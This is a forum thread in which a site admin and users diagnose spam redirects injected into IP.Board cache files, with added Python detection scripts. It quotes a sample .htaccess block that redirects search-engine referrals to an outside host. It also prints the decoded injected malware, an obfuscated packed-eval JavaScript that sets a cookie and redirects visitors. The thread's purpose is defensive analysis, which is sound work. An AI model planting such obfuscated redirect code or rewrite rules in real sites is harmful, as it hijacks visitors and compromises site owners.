edward
Posted November 16, 2009

Is it just me or does it seem that odforce is still redirecting to spam sites when coming from say google? Here's what just happened to me:

1. Sign out of odforce
2. Google for "edward odforce".
3. Click on the first link which is supposed to be some odforce forum thread. Redirection to spam site occurs.

I tried reproducing it immediately to no avail though. Maybe once my IP is registered, it doesn't do any redirection until my IP has timed out.

sam.h
Posted November 16, 2009

Happens to me too, usually the first one of the day.

itriix
Posted November 16, 2009

Yes, happens to me too. Just one time. Assuming, like you said, once it logs your IP, it will not redirect to there anymore. Stupid spam has their grips on everything now.

Marc
Posted November 16, 2009

Yip, sorry guys. It's a bunch of code that's been put into one of the files of the forum and I'm still trying to track down the source of it. Basically it resides in one of the cache files, so every time the cache gets regenerated the dodgy code gets put back in.

The reason it only happens once is because it writes a cookie saying that you've gone there already. And it only happens if you come from google (or one of the other search engines).

So I know exactly what it is and how it works, I just can't find where the darn thing comes from. I'll get it one day (hopefully).

Cheers
Marc

geo
Posted November 16, 2009 (edited)

Hi Everyone, it occurred to me also many times...

@Marc: I don't know if you've done it already, but I would first of all check out my .htaccess file. Following is a sample code that makes your site redirect when called via a search engine:

    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://somethingsomething.xom/in.html?s=ipw2 [R,L]

When typing the URL into the address bar of the browser, the "referer" is no longer Google, or any of the other search engines, so the redirect does not occur. It may be more complex than that, but if it was me I would begin here.

Hope that helps
Cheers
Georges

Edited November 16, 2009 by geo

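Added example (not part of the original thread): one way to audit an .htaccess file for the pattern geo describes, a chain of search-engine `HTTP_REFERER` conditions guarding a `RewriteRule` that points at another host. The function name, the `own_hosts` parameter and the `forum.example.org` host are assumptions made for this sketch; the sample input is constructed from the rules quoted in the post.

```python
import re
from urllib.parse import urlsplit

# Referer substrings taken from the sample rules quoted in the post above.
ENGINES = ("google", "aol", "msn", "altavista", "ask", "yahoo")
COND = re.compile(r"\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE = re.compile(r"\s*RewriteRule\s+\S+\s+(\S+)", re.I)


def find_referer_redirects(htaccess_text, own_hosts=()):
    """Return (line_no, target_host, engines) for every RewriteRule that sends
    search-engine referrals to a host outside own_hosts."""
    findings, engines = [], []
    for line_no, line in enumerate(htaccess_text.splitlines(), 1):
        cond = COND.match(line)
        if cond:
            # Conditions accumulate until the RewriteRule they guard.
            pattern = cond.group(1).lower()
            engines += [e for e in ENGINES if e in pattern]
            continue
        rule = RULE.match(line)
        if rule:
            # An absolute URL on another host makes mod_rewrite redirect externally.
            host = urlsplit(rule.group(1)).hostname
            if engines and host and host.lower() not in own_hosts:
                findings.append((line_no, host, sorted(set(engines))))
            engines = []  # the condition chain ends at its rule
    return findings


# Constructed sample: a legitimate canonical-host rule (hypothetical host)
# followed by part of the redirect block quoted in the post.
SAMPLE = r"""RewriteEngine On
RewriteCond %{HTTP_HOST} !^forum\.example\.org$ [NC]
RewriteRule ^(.*)$ http://forum.example.org/$1 [R=301,L]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://somethingsomething.xom/in.html?s=ipw2 [R,L]
"""

if __name__ == "__main__":
    for hit in find_referer_redirects(SAMPLE, own_hosts={"forum.example.org"}):
        print("suspicious redirect at line %d -> %s (referers: %s)" % hit)
```
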
Marc
Posted November 16, 2009

Yeah, it's a similar thing (sort of). There is a base_64 encoded script in my language cache file. And when it evaluates it checks the referrer and redirects to that site if you come from a search engine.

It's definitely an IPB thing and very specific to this version, and although they think we've been hacked there isn't any evidence of it anywhere. I suspect that version 3.0 had a vulnerability which was subsequently patched; unfortunately we got hit before that and there's still some dodgy code in the forum somewhere.

I'll be digging again tonight to see if I can find it.... sigh

goldleaf
Posted June 5, 2010

Hi Marc, just wanted to chime in and let you know that google results still jump to spam sites. Thanks for keeping odforce running!

Marc
Posted June 5, 2010

ok thanks, I'll apply the temp fix again..and you're welcome

Marc
Posted July 15, 2010

Hey, just an update for anyone who cares (and anyone finding this thread through google). It seems as if vbulletin boards are also being hacked with the same symptoms. Ours seems to have changed where the base_64 code now decodes to something that looks like this:

    var ipbs = 'e28e9daa'; eval(function (p, a, c, k, e, d) { e = function (c) { return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) }; if (!''.replace(/^/, String)) { while (c--) { d[e(c)] = k[c] || e(c) } k = [function (e) { return d[e] }]; e = function () { return '\\w+' }; c = 1 }; while (c--) { if (k[c]) { p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]) } } return p }('i a=["\\r\\d\\c\\k\\b\\y\\d","\\m\\d\\c\\k\\b\\y\\d","\\x\\z\\d\\M\\g\\b\\l\\d\\m\\j","\\c\\e\\K\\I\\k\\D\\c\\l\\b\\n\\r","\\v\\e\\e\\F\\b\\d","\\j","\\x\\z\\g\\w\\c\\p\\j\\f","\\b\\g\\C\\m","\\t","\\q\\e\\v\\w\\c\\b\\e\\n","\\p\\c\\c\\g\\E\\f\\f\\G\\l\\q\\t\\S\\H\\P\\b\\n\\R\\e\\f"];O s(A,o){i h=N J();h[a[1]](h[a[0]]()+L);i u=a[2]+h[a[3]]();B[a[4]]=A+a[5]+o+u+a[6]};s(a[7],a[8]);B[a[9]]=a[T]+Q;', 56, 56, '||||||||||_0x12bb|x69|x74|x65|x6F|x2F|x70|_0x102ex4|var|x3D|x54|x72|x73|x6E|_0x102ex3|x68|x6C|x67|ipbcc|x31|_0x102ex5|x63|x61|x3B|x6D|x20|_0x102ex2|document|x62|x53|x3A|x6B|x75|x33|x4D|Date|x47|86400000|x78|new|function|x2E|ipbs|x66|x32|10'.split('|'), 0, {}))

However I've found ones with var=vbsp, which means it's an exploit that affects both. So the good news is that it's bothering more people now, the bad news is that nobody seems to know how the exploit gets in and/or modifies the code.

Hopefully someone will find it soon though, otherwise I'm going to be putting in a cron job to clean up the cache file (sigh...).

Cheers
Marc

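Added example (not part of the original thread): a sketch of a check for the symptom Marc describes, a base64 blob in a cache file that decodes to a packed `eval(function (p, a, c, k, e, d)` script or to the `ipbs` / `vbsp` variable. The function name, the cache-file layout and both sample blobs are constructed for this sketch; they are not IPB's real format and not the injected code.

```python
import base64
import binascii
import re

# Markers taken from the decoded script quoted in the post above.
MARKERS = {
    "packed eval": re.compile(
        r"eval\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,\s*d\s*\)"),
    "ipbs/vbsp variable": re.compile(r"\bvar\s+(?:ipbs|vbsp)\b"),
}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def scan_cache_text(text):
    """Return (line_no, [marker names]) for each base64 run in text whose
    decoded bytes match at least one entry in MARKERS."""
    hits = []
    for run in B64_RUN.finditer(text):
        raw = run.group(0).rstrip("=")
        try:
            # Re-pad so runs cut from surrounding text still decode.
            decoded = base64.b64decode(raw + "=" * (-len(raw) % 4))
        except binascii.Error:
            continue  # not valid base64 after all
        script = decoded.decode("latin-1")
        names = [n for n, rx in MARKERS.items() if rx.search(script)]
        if names:
            hits.append((text.count("\n", 0, run.start()) + 1, names))
    return hits


# Constructed sample: the cache-file layout and both blobs are made up for
# this example; the second blob decodes to a harmless marker-only stub.
_BENIGN = base64.b64encode(b"plain avatar bytes, nothing scripted " * 2).decode()
_STUB = base64.b64encode(
    b"var ipbs = 'constructed'; eval(function (p, a, c, k, e, d) { return p })"
).decode()
SAMPLE = (
    "$lang['board_offline'] = 'The board is offline';\n"
    "$lang['avatar'] = '" + _BENIGN + "';\n"
    "$lang['footer'] = '" + _STUB + "';\n"
)

if __name__ == "__main__":
    for line_no, names in scan_cache_text(SAMPLE):
        print("line %d: base64 blob decodes to %s" % (line_no, ", ".join(names)))
```

Run against each regenerated cache file, a non-empty result is the signal that the injected code has come back.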
Marc
Posted May 31, 2011

Hey everyone

So after fixing the problem for just under a year, it seems like the hack is back. I'm probably going to have to upgrade to the latest version of the forum to see if that solves the problem. I'll keep you updated as to when that might happen.

Thanks
Marc

edward
Posted June 1, 2011

Although I have always assumed this, I'll ask anyhow. This has always meant that our usernames/passwords have been long compromised?

Matt_K
Posted June 1, 2011

Hey Marc!

It appears that there are many exploits available to hack IP Board! One particular being a hack of the 'se_redirect.php' file - do you see anything suspicious in there?

I will have a deeper look through the many search results tonight and see if I can find anything relating to the issue on od[force].

Later!
Matt.

Marc
Posted June 1, 2011

> Although I have always assumed this, I'll ask anyhow. This has always meant that our usernames/passwords have been long compromised?

Hey Ed

I don't think so. From what I can tell it's a vulnerability in the forum where some code gets injected into the cache files. So the way it works is that if you come here via one of the search engines it detects that and redirects you to the stupid url123.info site. What it then does is write a cookie with a value of 1 that expires in 24 hours. This cookie just tells the script to only send you there once every 24 hours.

As far as I can tell the db hasn't been accessed in any way at all, although to be fair I haven't found the source of the problem (like how the code is being injected into the cache files)... so anything is possible.

@Matt: I've been trolling the script kiddy places to see if I can find the script that does it, but I can't seem to track it down. If you find anything please email me. I'll check out the redirect file tonight.

Thanks
Marc

Marc
Posted June 2, 2011

Hey all

I've fixed this for now. The code was put in a new cache file, which makes me suspect a vulnerability in this version of the forums' caching mechanism. I'll be trying to squeeze some time in to upgrade to the latest version soon.

Cheers
Marc